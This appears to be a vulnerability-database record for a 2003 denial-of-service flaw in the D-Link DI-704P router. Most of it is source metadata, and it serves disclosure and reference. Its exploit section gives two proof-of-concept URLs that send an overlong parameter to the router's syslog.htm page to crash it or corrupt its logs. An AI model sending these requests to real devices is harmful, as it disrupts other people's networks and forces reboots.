Details of VAR-E-200305-0078

ID

VAR-E-200305-0078

EDB ID

22647

TITLE

D-Link DI-704P - Syslog.HTM Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 22647

DESCRIPTION

D-Link DI-704P - Syslog.HTM Denial of Service.. dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 22647

AFFECTED PRODUCTS

vendor:

d link

model:

di-704p

scope:

version:

Trust: 1.3

sources: BID: 7686 // EXPLOIT-DB: 22647

EXPLOIT

source: https://www.securityfocus.com/bid/7686/info

D-Link DI-704P has been reported prone to a remote denial of service vulnerability.

The issue presents itself in a D-Link web interface page. It has been reported that when excessive is data passed URI parameter in a request for the vulnerable page, the router firmware the device behaves in an unstable manner.

Subsequent malicious requests may result in a complete denial of service condition requiring a device reboot, or in corruption of device logs.

Although unconfirmed, it should be noted that other D-Link devices that use related firmware might also be affected.

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

and

http://192.168.0.1/syslog.htm?
D=.........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
....................

Trust: 1.0

sources: EXPLOIT-DB: 22647

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 22647

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 22647

TYPE

Syslog.HTM Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 22647

CREDITS

Chris R

Trust: 0.6

sources: EXPLOIT-DB: 22647

EXTERNAL IDS

db:	BID	id:	7686	Trust: 1.9
db:	EXPLOIT-DB	id:	22647	Trust: 1.6
db:	EDBNET	id:	44830	Trust: 0.6

sources: BID: 7686 // EXPLOIT-DB: 22647 // EDBNET: 44830

REFERENCES

url:	https://www.securityfocus.com/bid/7686/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/22647/	Trust: 0.6
url:	http://www.dlink.com/products/broadband/di704p/	Trust: 0.3
url:	http://www.securityindex.net/d-link%20advisory%20local%20%20dos.txt	Trust: 0.3

sources: BID: 7686 // EXPLOIT-DB: 22647 // EDBNET: 44830

SOURCES

db:	BID	id:	7686
db:	EXPLOIT-DB	id:	22647
db:	EDBNET	id:	44830

LAST UPDATE DATE

2022-07-27T09:29:13.092000+00:00

SOURCES UPDATE DATE

db:

BID

id:

7686

date:

2003-05-26T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	7686	date:	2003-05-26T00:00:00
db:	EXPLOIT-DB	id:	22647	date:	2003-05-26T00:00:00
db:	EDBNET	id:	44830	date:	2003-05-26T00:00:00